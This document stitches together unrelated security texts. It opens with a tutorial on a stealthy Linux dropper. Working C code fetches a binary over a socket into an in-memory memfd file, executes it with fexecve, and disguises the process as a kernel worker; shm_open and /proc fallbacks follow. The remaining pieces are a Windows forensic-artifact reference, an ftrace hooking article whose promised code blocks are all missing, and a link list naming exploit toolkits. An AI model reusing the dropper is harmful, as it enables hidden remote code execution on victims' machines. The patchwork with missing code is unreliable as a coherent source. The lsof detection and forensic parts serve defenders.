( origin article )

Some weeks ago I found [this interesting article] (https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html 383), about injecting code in running processes without using 

. The article is very interesting and I recommend you to read it, but what caught my attention was a brief sentence towards the end. Actually this one:

The current payload in use is a simple 

open/memfd_create/sendfile/fexecve

 program

I’ve never heard before about 

 or 

… that’s why this sentence caught my attention.

In this paper we are going to talk about how to use these functions to develop a super-stealthy dropper. You could consider it as a malware development tutorial… but you know that it is illegal to develop and also to deploy malware. This means that, this paper is only for educational purposes… because, after all, a malware analyst needs to know how malware developers do their stuff in order to identify it, neutralise it and do what is needed to keep systems safe.

memfd_create

 and 

fexecve

So, after reading that intriguing sentence, I googled those two functions and I saw they were pretty cool. The first one is actually pretty awesome, it allows us to create a file in memory. We have quickly talked about this in [a previous paper] (Running binaries without leaving tracks), but for that we were just using 

 to store our file. That folder is actually stored in memory so, whatever we write there does not end up in the hard-drive (unless we run out of memory and we start swapping). However, the file was visible with a simple 

.

 does the same, but the memory disk it uses is not mapped into the file system and therefore you cannot find the file with a simple 

. 😮

The second one, 

 is also pretty awesome. It allows us to execute a program (exactly the same way that 

), but we reference the program to run using a file descriptor, instead of the full path. And this one matches perfectly with 

.

But there is a caveat with this function calls. They are relatively new. 

 was introduced in kernel 3.17 and 

 is a 

 function available since version 2.3.2. While, 

 can be easily implemented when not available (we will see that in a sec), 

 is just not there on old kernels…

What does this means?. It means that, at least nowadays, the technique we are going to describe will not work on embedded devices that usually run old kernels and have stripped-down versions of libc. Although, I haven’t checked the availability of 

 in for instance some routers or Android phones, I believe it is very likely that they are not available. If anybody knows, please drop a line in the comments.

A simple dropper

In order to figure out how these two little guys work, I wrote a simple dropper. Well, it is actually a program able to download some binary from a remote server and run it directly into memory, without dropping it in the disk.

Before continuing, let’s check the Hajime case we described [towards the end of this post] (IoT Malware Droppers (Mirai and Hajime)). There you will find a cryptic shell line that basically creates a file with execution permissions to drop into it another file which is downloaded from the net. Then the downloaded program gets executed and deleted from the disk. In case you don’t want to open the link again, this is the line I’m talking about:

cp .s .i; &gt;.i; .<span class="hljs-regexp">/.s&gt;.i; ./</span>.i; rm .s; /bin/busybox ECCHI

We are going to write a version of 

 that, once executed, will do exactly the same that the cryptic shell line above.

Let’s first take a look to the code and then we can comment it.

The code

This is the code:

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>



<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/syscall.h&gt;</span></span>



<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;unistd.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/types.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/socket.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;arpa/inet.h&gt;</span></span>



<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> __NR_memfd_create 319</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MFD_CLOEXEC 1</span>



<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">int</span> <span class="hljs-title">memfd_create</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *name, <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> flags)</span> </span>{

    <span class="hljs-keyword">return</span> syscall(__NR_memfd_create, name, flags);

}



<span class="hljs-keyword">extern</span> <span class="hljs-keyword">char</span>        **environ;



<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span> <span class="hljs-params">(<span class="hljs-keyword">int</span> argc, <span class="hljs-keyword">char</span> **argv)</span> </span>{

  <span class="hljs-keyword">int</span>                fd, s;

  <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>      addr = <span class="hljs-number">0x0100007f11110002</span>;

  <span class="hljs-keyword">char</span>               *args[<span class="hljs-number">2</span>]= {<span class="hljs-string">"[kworker/u!0]"</span>, <span class="hljs-literal">NULL</span>};

  <span class="hljs-keyword">char</span>               buf[<span class="hljs-number">1024</span>];



  <span class="hljs-comment">// Connect</span>

  <span class="hljs-keyword">if</span> ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);

  <span class="hljs-keyword">if</span> (connect (s, (struct sockaddr*)&amp;addr, <span class="hljs-number">16</span>) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);

  <span class="hljs-keyword">if</span> ((fd = memfd_create(<span class="hljs-string">"a"</span>, MFD_CLOEXEC)) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);



  <span class="hljs-keyword">while</span> (<span class="hljs-number">1</span>) {

      <span class="hljs-keyword">if</span> ((read (s, buf, <span class="hljs-number">1024</span>) ) &lt;= <span class="hljs-number">0</span>) <span class="hljs-keyword">break</span>;

      write (fd, buf, <span class="hljs-number">1024</span>);

    }

  close (s);

  

  <span class="hljs-keyword">if</span> (fexecve (fd, args, environ) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);



  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;

    

}

It is pretty short and simple, isn’t it?. But there are a couple of things we have to say about it.

Calling 

memfd_create

The first thing we have to comment is that, there is no 

 wrapper to the 

 system call. You would find this information in the 

 manpage’s NOTES section 42. That means that we have to write our own wrapper.

First, we need to figure out the syscall index for 

. Just use any on-line syscall list. Remember that the indexes changes with the architecture, so if you plan to use the code on an ARM or a MIPS, you may need to use a different index. The index we used 

 is for 

.

You can see the wrapper at the very beginning of the code (just after the 

 directives), using the 

 libc function.

Then, the program just does the following:

• Create a normal TCP socket
• Connect to port 0x1111 on 127.0.0.1 using family 
  AF_INET

  … We have packed all this information in a 

  long

   variable to make the code shorter… but you can easily modify this information taking into account that:

    addr = <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>  <span class="hljs-number">7</span>f   <span class="hljs-number">1111</span>  <span class="hljs-number">0002</span>;

            <span class="hljs-number">1</span>. <span class="hljs-number">0</span>. <span class="hljs-number">0</span>.<span class="hljs-number">127</span>   <span class="hljs-number">1111</span>  <span class="hljs-number">0002</span>;

           +------------+------+----

             IP Address <span class="hljs-params">| Port |</span> Family

Of course this is not standard and whenever the 

 change, the code will break down… but it was cool to write it like this 

• Creates a memory file
• Reads data from the socket and writes it into the memory file
• Runs the memory file once all the data has been transferred.

That’s it… very simple and straightforward.

Testing

So, now it is time to test it. According to our long constant in the 

 function, the 

 will connect to port 

 on localhost (

). So we will improvise a file server with 

.

In one console we just run this command:

$ cat /usr/bin/xeyes | nc -l $((<span class="hljs-number">0x1111</span>))

You can chose whatever binary you prefer. I like those little eyes following my mouse pointer all over the place

Then in another console we run the dropper, and those funny 

 should pop-up in your screen. Let’s see which tracks we can find after running the remote code.

Detecting the dropper

Spotting the process is difficult because we have given it a funny name (

). Note the 

 character that is just there to allow me to quickly identify the process for debugging purposes. In reality, you would like to use a 

 so the process looks like one of those kernel workers. But, let’s look at the 

 output.

$ ps axe

(...)

 2126 ?        S      0:00 [kworker/0:0]

 2214 pts/0    S+     0:00 [kworker/u!0]

(...)

You can see the output for a legit 

 process in the first line, and then you find our doggy program in the second line… which is associated to a pseudo-terminal!!!.. I think this can be easily avoided… but I will leave this to you to sharp your UNIX development skills 

However, even if you detach the process from the pseudo-terminal…

Invisible file

We mentioned that 

 will create a file in a RAM filesystem that is not mapped into the normal filesystem tree… at least, if it is mapped, I couldn’t find where. So far this looks like a pretty stealth way to drop a file!!

However, let’s face it, if there is a file somewhere, there should be a way to find it… shouldn’t it? Of course it is. But, when you are in this kind of troubles… who you gonna call?.. Sure… Ghostbusters!. And you know what?, for GNU/Linux systems the way to bust ghosts is using 

 :).

$ lsof | grep memfd

3         2214            pico  txt       REG                0,5    19928      28860 /memfd:a (deleted)

So, we can easily find any 

 file in the system using 

. Note that 

 will also indicate the associated PID so we can also easily pin point the dropped process even when it is using some name camouflage and it is not associated to a pseudo-terminal!!!

What if 

memfd_open

 is not available?

We have mentioned that 

 is only available on kernels 3.17 or higher. What can be done for other kernels?. In this case we will be a bit less stealthy but we can still do pretty well.

Our best option in this case is to use 

 (SHared Memory Open). This function basically creates a file under 

… however, this one will be visible with 

, but at least we avoid writing to the disk. The only difference between using 

 or just 

 is that 

 will create the files directly under 

. While, when using 

 we have to provide the whole path.

To modify the dropper to use 

 we have to do two things.

First we have to substitute the 

 call by a 

 call like this:

(...)

<span class="hljs-keyword">if</span> ((fd = shm_open(<span class="hljs-string">"a"</span>, O_RDWR | O_CREAT, S_IRWXU)) &lt; 0) <span class="hljs-built_in">exit</span> (1);

(...)

The second thing is that we need to close the file and re-open it read-only in order to be able to execute it with 

. So, after the while loop that populates the file we have to close and re-open the file:

(...)

  <span class="hljs-keyword">close</span> (fd);



  <span class="hljs-keyword">if</span> ((fd = shm_open(<span class="hljs-string">"a"</span>, O_RDONLY, <span class="hljs-number">0</span>)) &lt; <span class="hljs-number">0</span>) <span class="hljs-keyword">exit</span> (<span class="hljs-number">1</span>);

(...)

However note that, now it does not make much sense to use 

 and we can avoid reopening the file read-only and just call 

 on the file created at 

 which is effectively the same and it is also shorter.

… and what if 

fexecve

 is not available?

This one is pretty easy, whenever you get to know how 

 works. How can you figure out how the function works?.. just google for its source code!!!. A hint is provided in the man page tho:

NOTES
On Linux, fexecve() is implemented using the proc(5) file system, so /proc needs to be mounted and available at the time of the call.

So, what it does is to just use 

 but providing as file path the file descriptor entry under 

. Let’s elaborate this a bit more. You know that each open file is identified by an integer and you also know that each process in your GNU/Linux system exports all its related information under the 

 pseudo file system in a folder named against its PID (supposing the 

 file system is mounted). Well, inside that folder you will find another folder named 

 containing a file per each file descriptor opened by the process. Each file is named against its actual file descriptor, that is, the integer number.

Knowing all this, we can run a file identified by a file descriptor just passing the path to the right file under 

 to 

. A basic implementation of 

 will look like this:

<span class="hljs-function"><span class="hljs-keyword">int</span>

<span class="hljs-title">my_fexecve</span> <span class="hljs-params">(<span class="hljs-keyword">int</span> fd, <span class="hljs-keyword">char</span> **arg, <span class="hljs-keyword">char</span> **env)</span> </span>{

  <span class="hljs-keyword">char</span>  fname[<span class="hljs-number">1024</span>];



  <span class="hljs-built_in">snprintf</span> (fname, <span class="hljs-number">1024</span>, <span class="hljs-string">"/proc/%d/fd/%d"</span>, getpid(), fd);

  execve (fname, arg, env);

  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;

}

This implementation of 

 is completely equivalent to the standard one… well it is missing some sanity checks but, after all, we’re living in the edge :P.

As mentioned before, this is very convenient to be used together with 

 that returns to us a file descriptor and does not require the 

 sequence. Otherwise, when there is a file somewhere, even in memory, it is even faster to just use 

 as you can infer from the implementation above.

Conclusions

Well, this is it. Hope you have found this interesting. It was interesting for me. Now, after having read this paper, you should be able to figure out what the open/memfd_create/sendfile/fexecve we mentioned at the beginning means…

We have also seen a quite stealthy technique to drop files in a remote system. And we have also learn how to detect the dropper even when it may look invisible at first glance.

You can download all the code from: 0x00pf/0x00sec_code

The main focus of this post, and particularly the associated table of artifacts, is to serve as a reference and reminder of what evidence sources may be available on a particular system during analysis.

On to the main event. The table below details some of the artifacts which evidence program execution and whether they are available for different versions of the Windows Operating System.

Too Small?… It’s a hyperlink!

Cells in Green are where the artifact is available by default, note some artifacts may not be available despite a Green cell (e.g. instances where prefetch is disabled due to an SSD)

Cells in yellow indicate that the artifact is associated with a feature that is disabled by default but that may be enabled by an administrator (e.g. Prefetch on a Windows Server OS) or added through the application of a patch or update (e.g. The introduction of BAM to Windows 10 in 1709+ or back-porting of Amcache to Windows 7 in the optional update KB2952664+)

Cells in Red indicate that the artifact is not available in that version of the OS.

Cells in Grey (containing «TBC») indicate that I’m not 100% sure at the time of writing whether the artifact is present in a particular OS version, that I have more work to do, and that it would be great if you could let me know if you already know the answer!

It is my hope that this table will be helpful to others. It will be updated and certainly at this stage it may be subject to errors as I am reliant upon research and memory of artifacts without having the opportunity to double check each entry through testing. Feedback, both in the form of suggested additions and any required corrections is very much appreciated and encouraged.

Summary of Artifacts

Prefetch

Prefetch has historically been the go to indication of process execution. If enabled, it can provide a wealth of useful data in an investigation or incident response. However, since Windows 7, systems with an SSD installed as the OS volume have had prefetch disabled by default during installation. With that said, I have seen plenty of systems with SSDs which have still had prefetch enabled (particularaly in businesses which push a standard image) so it is always worth checking for. Windows Server installations also have Prefetch disabled by default, but the same applies.

The following registry key can be used to determine if it is enabled:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher
0 = Disabled
1 = Only Application launch prefetching enabled
2 = Only Boot prefetching enabled
3 = Both Application launch and Boot prefetching enabled

References/Tools:
https://www.forensicmag.com/article/2010/12/decoding-prefetch-files-forensic-purposes-part-1
https://github.com/EricZimmerman/Prefetch

ShimCache

It should be noted that the presence of an entry for an executable within the ShimCache doesn’t always mean it was executed as merely navigating to it can cause it to be listed. Additionally Windows XP ShimCache is limited to 96 entries all versions since then retain up to 1024 entries.

ShimCache has one further notable drawback. The information is retained in memory and is only written to the registry when the system is shutdown. Data can be retrieved from a memory image if available.

References/Tools:
https://www.fireeye.com/blog/threat-research/2015/06/caching_out_the_val.html
https://www.andreafortuna.org/cybersecurity/amcache-and-shimcache-in-forensic-analysis/
https://github.com/EricZimmerman/AppCompatCacheParser

MUICache

Programs executed via Explorer result in MUICache entries being created within the NTUSER.DAT of the user responsible.

References/Tools:
http://windowsir.blogspot.com/2005/12/mystery-of-muicachesolved.html
http://what-when-how.com/windows-forensic-analysis/registry-analysis-windows-forensic-analysis-part-8/

Amcache / RecentFileCache.bcf

Amcache.hve within Windows 8+ and RecentFileCache.bcf within Windows 7 are two distinct artifacts which are used by the same mechanism in Windows to track application compatibility issues with different executables. As such it can be used to determine when executables were first run.

References/Tools:
https://www.andreafortuna.org/cybersecurity/amcache-and-shimcache-in-forensic-analysis/
http://www.swiftforensics.com/2013/12/amcachehve-in-windows-8-goldmine-for.html
http://digitalforensicsurvivalpodcast.com/2016/07/05/dfsp-020-amcache-forensics-find-evidence-of-app-execution/
https://www.dfir.training/windows/amcache/207-lifars-amcache-and-shimcache-forensics/file

Microsoft-Windows-TaskScheduler (200/201)

The Microsoft-Windows-TaskScheduler log file (specifically events 200 and 201), can evidence the starting and stopping of and executable which is being run as a scheduled task.

References/Tools:
https://www.fireeye.com/blog/threat-research/2013/08/execute.html

LEGACY_* Registry Keys

Applicable to Windows XP/Server 2003 only, this artifact is located in the System Registry Hive, these keys can evidence the running of executables which are installed as a service.

References/Tools:
http://windowsir.blogspot.com/2013/07/howto-determine-program-execution.html
http://journeyintoir.blogspot.com/2014/01/it-is-all-about-program-execution.html

Microsoft-Windows-Application-Experience Program-Inventory / Telemetry

Both of these system logs are related to the Application Experience and Compatibility features implemented in modern versions of Windows.

At the time of testing I find none of my desktop systems have the Inventory log populated, while the Telemetry log seems to contain useful information. I have however seen various discussion online indicating that the Inventory log is populated in Windows 10. It is likely that my disabling of all tracking and reporting functions on my personal systems and VMs may be the cause… more testing required.

References/Tools:
http://journeyintoir.blogspot.com/2014/03/exploring-program-inventory-event-log.html

Background Activity Monitor (BAM)

The Background Activity Monitor (BAM) and (DAM) registry keys within the SYSTEM registry hive, however as it records them under the SID of the associated user it is user attributable. The key details  the path of executable files that have been executed and last execution date/time

It was introduced to Windows 10 in 1709 (Fall Creators update).

References/Tools:
https://www.andreafortuna.org/dfir/forensic-artifacts-evidences-of-program-execution-on-windows-systems/
https://www.linkedin.com/pulse/alternative-prefetch-bam-costas-katsavounidis/

System Resource Usage Monitor (SRUM)

Introduced in Windows 8, this Windows features maintains a record of all sorts of interesting information concerning applications and can be used to determine when applications were running.

References/Tools:
https://www.sans.org/summit-archives/file/summit-archive-1492184583.pdf
http://cyberforensicator.com/2017/08/06/windows-srum-forensics/
https://github.com/MarkBaggett/srum-dump

ActivitiesCache.db

In Windows 10 1803 (April 2018) Update, Microsoft introduced the Timeline feature, and all forensicators did rejoice. This artifact is a goldmine for user activity analysis and the associated data is stored within an ActivitiesCache.db located within each users profile.

References/Tools:
https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
https://binaryforay.blogspot.com/2018/05/introducing-wxtcmd.html

Security Log (592/4688)

Event IDs 592 (Windows XP/2003) and 4688 (everything since) are recorded within the Security log on process creation, but only if Audit Process Creation is enabled.

References/Tools:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=592
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4688

System Log (7035)

Event ID 7035 within the System event log is recorded by the Service Control Manager when a Service starts or stops. As such it can be an indication of execution if the associated process is registered as a service.

References/Tools:
http://www.eventid.net/display-eventid-7035-source-Service%20Control%20Manager-eventno-1530-phase-1.htm

UserAssist

Within each users NTUSER.DAT the UserAssist key tracks execution of GUI applications.

References/Tools:
https://www.4n6k.com/2013/05/userassist-forensics-timelines.html
https://blog.didierstevens.com/programs/userassist/
https://www.nirsoft.net/utils/userassist_view.html

RecentApps

The RecentApps key is located in the NTUSER.DAT associated with each user and contains a record of their… Recent Applications. The presence of keys associated with a particular executable evidence the fact that this user ran the executable.

References/Tools:
https://df-stream.com/2017/10/recentapps/

JumpLists

Implemented in Windows 7, Jumplists are a mechanism by which Windows records and presents recent documents and applications to users. Located within individual users profiles the presence of references to executable(s) within the ‘Recent\AutomaticDestinations’ can be used to evidence the fact that they were run by the user.

References/Tools:
https://articles.forensicfocus.com/2012/10/30/forensic-analysis-of-windows-7-jump-lists/
https://www.blackbagtech.com/blog/2017/01/12/windows-10-jump-list-forensics/
https://ericzimmerman.github.io/#!index.md

RunMRU

The RunMRU is a list of all commands typed into the Run box on the Start menu and is recorded within the NTUSER.DAT associated with each user. Commands referencing executables can be used to determine if, how and when the executable was run and which user account was associated with running it.

References/Tools:
http://www.forensicfocus.com/a-forensic-analysis-of-the-windows-registry
http://what-when-how.com/windows-forensic-analysis/registry-analysis-windows-forensic-analysis-part-8/

AppCompatFlags Registry Keys

References/Tools:
https://journeyintoir.blogspot.com/2013/12/revealing-program-compatibility.html

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Ftrace is a Linux kernel framework for tracing Linux kernel functions. But our team managed to find a new way to use ftrace when trying to enable system activity monitoring to be able to block suspicious processes. It turns out that ftrace allows you to install hooks from a loadable GPL module without rebuilding the kernel. This approach works for Linux kernel versions 3.19 and higher for the x86_64 architecture.

A new approach: Using ftrace for Linux kernel hooking

What is an ftrace? Basically, ftrace is a framework used for tracing the kernel on the function level. This framework has been in development since 2008 and has quite an impressive feature set. What data can you usually get when you trace your kernel functions with ftrace? Linux ftrace displays call graphs, tracks the frequency and length of function calls, filters particular functions by templates, and so on. Further down this article you’ll find references to official documents and sources you can use to learn more about the capabilities of ftrace.

The implementation of ftrace is based on the compiler options -pg and -mfentry. These kernel options insert the call of a special tracing function — mcount() or __fentry__() — at the beginning of every function. In user programs, profilers use this compiler capability for tracking calls of all functions. In the kernel, however, these functions are used for implementing the ftrace framework.

Calling ftrace from every function is, of course, pretty costly. This is why there’s an optimization available for popular architectures — dynamic ftrace. If ftrace isn’t in use, it nearly doesn’t affect the system because the kernel knows where the calls mcount() or __fentry__() are located and replaces the machine code with nop (a specific instruction that does nothing) at an early stage. And when Linux kernel trace is on, ftrace calls are added back to the necessary functions.

Description of necessary functions

The following structure can be used for describing each hooked function:

There are only three fields that the user needs to fill in: name, function, and original. The rest of the fields are considered to be implementation details. You can put the description of all hooked functions together and use macros to make the code more compact:

This is what the hooked function wrapper looks like:

Now, hooked functions have a minimum of extra code. The only thing requiring special attention is the function signatures. They must be completely identical; otherwise, the arguments will be passed on incorrectly and everything will go wrong. This isn’t as important for hooking system calls, though, since their handlers are pretty stable and, for performance reasons, the system call ABI and function call ABI use the same layout of arguments in registers. However, if you’re going to hook other functions, remember that the kernel has no stable interfaces.

Initializing ftrace

Our first step is finding and saving the hooked function address. As you probably know, when using ftrace, Linux kernel tracing can be performed by the function name. However, we still need to know the address of the original function in order to call it.

You can use kallsyms — a list of all kernel symbols — to get the address of the needed function. This list includes not only symbols exported for the modules but actually all symbols. This is what the process of getting the hooked function address can look like:

Next, we need to initialize the ftrace_ops structure. Here we have one necessary field, func, pointing to the callback. However, some critical flags are needed:

The fh_ftrace_thunk () feature is our callback that ftrace will call when tracing the function. We’ll talk about this callback later. The flags are needed for hooking — they command ftrace to save and restore the processor registers whose contents we’ll be able to change in the callback.

Now we’re ready to turn on the hook. First, we use ftrace_set_filter_ip() to turn on the ftrace utility for the needed function. Second, we use register_ftrace_function() to give ftrace permission to call our callback:

To turn off the hook, we repeat the same actions in reverse:

When the unregister_ftrace_function() call is over, it’s guaranteed that there won’t be any activations of the installed callback or our wrapper in the system. We can unload the hook module without worrying that our functions are still being executed somewhere in the system. Next, we provide a detailed description of the function hooking process.

Hooking functions with ftrace

So how can you configure kernel function hooking? The process is pretty simple: ftrace is able to alter the register state after exiting the callback. By changing the register %rip — a pointer to the next executed instruction — we can change the function executed by the processor. In other words, we can force the processor to make an unconditional jump from the current function to ours and take over control.

This is what the ftrace callback looks like:

We get the address of struct ftrace_hook for our function using a macro container_of() and the address of struct ftrace_ops embedded in struct ftrace_hook. Next, we substitute the value of the register %rip in the struct pt_regs structure with our handler’s address. For architectures other than x86_64, this register can have a different name (like PC or IP). The basic idea, however, still applies.

Note that the notrace specifier added for the callback requires special attention. This specifier can be used for marking functions that are prohibited for Linux kernel tracing with ftrace. For instance, you can mark ftrace functions that are used in the tracing process. By using this specifier, you can prevent the system from hanging if you accidentally call a function from your ftrace callback that’s currently being traced by ftrace.

The ftrace callback is usually called with a disabled preemption (just like kprobes), although there might be some exceptions. But in our case, this limitation wasn’t important since we only needed to replace eight bytes of %rip value in the pt_regs structure.

Since the wrapper function and the original are executed in the same context, both functions have the same restrictions. For instance, if you hook an interrupt handler, then sleeping in the wrapper is still out of the question.

Protection from recursive calls

There’s one catch in the code we gave you before: when the wrapper calls the original function, the original function will be traced by ftrace again, thus causing an endless recursion. We came up with a pretty neat way of breaking this cycle by using parent_ip — one of the ftrace callback arguments that contains the return address to the function that called the hooked one. Usually, this argument is used for building function call graphs. However, we can use this argument to distinguish the first traced function call from the repeated calls.

The difference is significant: during the first call, the argument parent_ip will point to some place in the kernel, while during the repeated call it will only point inside our wrapper. You should pass control only during the first function call. All other calls must let the original function be executed.

We can run the entry test by comparing the address to the boundaries of the current module with our functions. However, this approach works only if the module doesn’t contain anything other than the wrapper that calls the hooked function. Otherwise, you’ll need to be more picky.

So this is what a correct ftrace callback looks like:

This approach has three main advantages:

• Low overhead costs. You need to perform only several comparisons and subtractions without grabbing any spinlocks or iterating through lists.
• It doesn’t have to be global. Since there’s no synchronization, this approach is compatible with preemption and isn’t tied to the global process list. As a result, you can trace even interrupt handlers.
• There are no limitations for functions. This approach doesn’t have the main kretprobes drawback and can support any number of trace function activations (including recursive) out of the box. During recursive calls, the return address is still located outside of our module, so the callback test works correctly.

In the next section, we take a more detailed look at the hooking process and describe how ftrace works.

The scheme of the hooking process

So, how does ftrace work? Let’s take a look at a simple example: you’ve typed the command Is in the terminal to see the list of files in the current directory. The command-line interpreter (say, Bash) launches a new process using the common functions fork() plus execve() from the standard C library. Inside the system, these functions are implemented through system calls clone() and execve() respectively. Let’s suggest that we hook the execve() system call to gain control over launching new processes.

Figure 1 below gives an ftrace example and illustrates the process of hooking a handler function.

Figure 1. Linux kernel hooking with ftrace.

In this image, we can see how a user process (blue) executes a system call to the kernel (red) where the ftrace framework (violet) calls functions from our module (green).

Below, we give a more detailed description of each step of the process:

1. The SYSCALL instruction is executed by the user process. This instruction allows switching to the kernel mode and puts the low-level system call handler entry_SYSCALL_64() in charge. This handler is responsible for all system calls of 64-bit programs on 64-bit kernels.
2. A specific handler receives control. The kernel accomplishes all low-level tasks implemented on the assembler pretty fast and hands over control to the high-level do_syscall_64 () function, which is written in C. This function reaches the system call handler table sys_call_table and calls a particular handler by the system call number. In our case, it’s the function sys_execve ().
3. Calling ftrace. There’s an __fentry__() function call at the beginning of every kernel function. This function is implemented by the ftrace framework. In the functions that don’t need to be traced, this call is replaced with the instruction nop. However, in the case of the sys_execve() function, there’s no such call.
4. Ftrace calls our callback. Ftrace calls all registered trace callbacks, including ours. Other callbacks won’t interfere since, at each particular place, only one callback can be installed that changes the value of the %rip register.
5. The callback performs the hooking. The callback looks at the value of parent_ip leading inside the do_syscall_64() function — since it’s the particular function that called the sys_execve() handler — and decides to hook the function, changing the values of the register %rip in the pt_regs structure.
6. Ftrace restores the state of the registers. Following the FTRACE_SAVE_REGS flag, the framework saves the register state in the pt_regs structure before it calls the handlers. When the handling is over, the registers are restored from the same structure. Our handler changes the register %rip — a pointer to the next executed function — which leads to passing control to a new address.
7. Wrapper function receives control. An unconditional jump makes it look like the activation of the sys_execve() function has been terminated. Instead of this function, control goes to our function, fh_sys_execve(). Meanwhile, the state of both processor and memory remains the same, so our function receives the arguments of the original handler and returns control to the do_syscall_64() function.
8. The original function is called by our wrapper. Now, the system call is under our control. After analyzing the context and arguments of the system call, the fh_sys_execve() function can either permit or prohibit execution. If execution is prohibited, the function returns an error code. Otherwise, the function needs to repeat the call to the original handler and sys_execve() is called again through the real_sys_execve pointer that was saved during the hook setup.
9. The callback gets control. Just like during the first call of sys_execve(), control goes through ftrace to our callback. But this time, the process ends differently.
10. The callback does nothing. The sys_execve() function was called not by the kernel from do_syscall_64() but by our fh_sys_execve() function. Therefore, the registers remain unchanged and the sys_execve() function is executed as usual. The only problem is that ftrace sees the entry to sys_execve() twice.
11. The wrapper gets back control. The system call handler sys_execve() gives control to our fh_sys_execve() function for the second time. Now, the launch of a new process is nearly finished. We can see if the execve() call finished with an error, study the new process, make some notes to the log file, and so on.
12. The kernel receives control. Finally, the fh_sys_execve() function is finished and control returns to the do_syscall_64() function. The function sees the call as one that was completed normally, and the kernel proceeds as usual.
13. Control goes to the user process. In the end, the kernel executes the IRET instruction (or SYSRET, but for execve() there can be only IRET), installing the registers for a new user process and switching the processor into user code execution mode. The system call is over and so is the launch of the new process.

As you can see, the process of hooking Linux kernel function calls with ftrace isn’t that complex.

Conclusion

Even though the main purpose of ftrace is to trace Linux kernel function calls rather than hook them, our innovative approach turned out to be both simple and effective. However, the approach we describe above works only for kernel versions 3.19 and higher and only for the x86_64 architecture.

In the final part of our series, we’ll tell you about the main ftrace pros and cons and some unexpected surprises that might be waiting for you if you decide to implement this approach. Meanwhile, you can read about another unusual solution for installing hooks — by using the GCC attribute constructor with LD_PRELOAD.

 █████╗ ██████╗ ██████╗ ███████╗███████╗ ██████╗    ███████╗███████╗██╗███╗   ██╗███████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔════╝██╔════╝    ██╔════╝╚══███╔╝██║████╗  ██║██╔════╝
███████║██████╔╝██████╔╝███████╗█████╗  ██║         █████╗    ███╔╝ ██║██╔██╗ ██║█████╗  
██╔══██║██╔═══╝ ██╔═══╝ ╚════██║██╔══╝  ██║         ██╔══╝   ███╔╝  ██║██║╚██╗██║██╔══╝  
██║  ██║██║     ██║     ███████║███████╗╚██████╗    ███████╗███████╗██║██║ ╚████║███████╗
╚═╝  ╚═╝╚═╝     ╚═╝     ╚══════╝╚══════╝ ╚═════╝    ╚══════╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝
### Week: 41 | Month: October | Year: 2018 | Release Date: 12/10/2018 | Edition: #243 ###


'  ╔╦╗┬ ┬┌─┐┌┬┐  ╔═╗┌─┐┌─┐
'  ║║║│ │└─┐ │   ╚═╗├┤ ├┤ 
'  ╩ ╩└─┘└─┘ ┴   ╚═╝└─┘└─┘
'  Something that's really worth your time!


URL: https://blog.sheddow.xyz/css-timing-attack/
Description: A timing attack with CSS selectors and Javascript.

URL: http://www.sec-down.com/wordpress/?p=809
Description: An interesting Google vulnerability that got me 3133.7 reward.

URL: http://bit.ly/2OQkWuJ (+)
Description: Get as image() pulls Insights/NRQL data from New Relic accounts (IDOR).


'  ╦ ╦┌─┐┌─┐┬┌─
'  ╠═╣├─┤│  ├┴┐
'  ╩ ╩┴ ┴└─┘┴ ┴
'  Some Kung Fu Techniques.


URL: https://github.com/hdm/mac-ages
Description: MAC address age tracking.

URL: https://github.com/nulpwn/WiPray
Description: Wifi Password Spray in EAP-MSCHAPv2 networks.

URL: https://github.com/hausec/ADAPE-Script
Description: Active Directory Assessment and Privilege Escalation Script.

URL: https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules
Description: Rules for detecting security issues in Angular 1.x.

URL: https://github.com/samhaxr/TakeOver-v1
Description: Takeover script extracts CNAME record of all subdomains at once.

URL: https://github.com/blueudp/DorkMe
Description: Making easier the searching of vulnerabilities with Google Dorks.

URL: https://github.com/sdnewhop/sdwan-harvester
Description: SD-WAN Harvester - Automatically enumerate/fingerprint SD-WAN nodes.

URL: https://github.com/JackOfMostTrades/bluebox
Description: Automated Exploit Toolkit for CVE-2015-6095 and CVE-2016-0049.

URL: https://github.com/cobbr/SharpSploit
